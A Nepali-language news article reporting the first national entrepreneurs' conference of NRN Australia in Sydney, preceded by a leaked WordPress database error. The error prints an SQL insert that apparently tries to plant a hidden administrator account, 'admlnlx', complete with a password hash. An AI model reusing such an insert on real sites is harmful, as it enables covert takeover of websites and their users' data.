WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bg.0CoWUAjM9lzC6tc7OHLjJUSMrR3.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 04:10:55', '', 'admlnlx', 'admlnlx')
सिड्नी, माघ २३-
गैरआवासीय नेपाली संघ अष्ट्रेलियाको पहिलो राष्ट्रिय उद्यमी सम्मेलन २०१७ आइतबार सिड्नीमा आयोजना गरिएको छ ।
नेपाली र अष्ट्रेलियन राष्ट्रिय गानबाट सुरु भएको सम्मेलनको उदघाटन न्यू साउथ वेल्सका लागि महावाणिज्य दूत दिपक खड्का, गैरआवासीय नेपाली संघका संरक्षक इन्द्रा बन र गैरआवासीय नेपाली संघ अष्ट्रेलियाका अध्यक्ष सुरेन्द्र सिग्देलले संयुक्तरुपमा गरे ।रेज होटलमा आयोजित सम्मेलनमा अष्ट्रेलियाका बिभिन्न राज्यबाट नेपाली उद्यमी व्यवसायीहरुलाई अष्ट्रेलिया नेपाल बिजनेस काउन्सीलका अध्यक्ष मन केसीले स्वागत मन्तव्य राखेका थिए ।
सम्मेलनको पहिलो सत्रमा एनआएन अष्ट्रेलियाका पूर्वअध्यक्ष गोवा कटवाल, अष्ट्रेलियन हिमालय फाउन्डेसनका अध्यक्ष सिमोन बल्डेस्ट्रन, प्रमेश खड्का र भिम खरेल, डा. किशोर वैद्य, श्याम केसी, सोनिसा श्रेष्ठलगायतले कार्यपत्र पेश गरेका छन् ।पहिलो सत्रमा महावाणिज्य दूत दिपक खड्काले नेपालबाट हङकङ हुँदै अष्ट्रेलियामा व्यापारीक रुपमा कसरी स्थापित भइयो भन्ने प्रेरणादायी मन्तव्य राखेका थिए ।यसैगरी दोस्रो सत्रमा मिचेले जोनसन, किरण थापा, जविन श्रेष्ठ, मेघनाथ श्रेष्ठ, डिला खरेल, स्कट योङ, भानविसा ब्राउन, विवेक थापा, समिम अनवर लगायतले पनि कार्यपत्र पेश गरेका थिए ।
एनआरएन अन्तराष्ट्रिय समन्वय परिषदका अध्यक्ष डा. शेष घले र नेपाली दूतावास क्यानवेराका राजदूत राजेन्द्र पाण्डेले प्रेरणादायी मन्तव्य दिएका थिए ।समग्र सेशनको सहजकर्ताको रुपमा डा. राजु अधिकारीले भूमिका निर्वाह गरेका थिए भने केशव शर्मा, भरतराज पौडेल, डा. समशेरसिंह थापाले सम्मेलनका घोषणाहरु तयार पारेका थिए ।
एनआरएन अष्ट्रेलियाका सचिव टोनु घतानेले प्रारम्भ गरेको कार्यक्रममा एनआरएन अष्ट्रेलियाका अध्यक्ष सुरेन्द्र सिग्देलले सहभागी सबैलाई धन्यवाद दिँदै समापन मन्तव्य दिएका थिए ।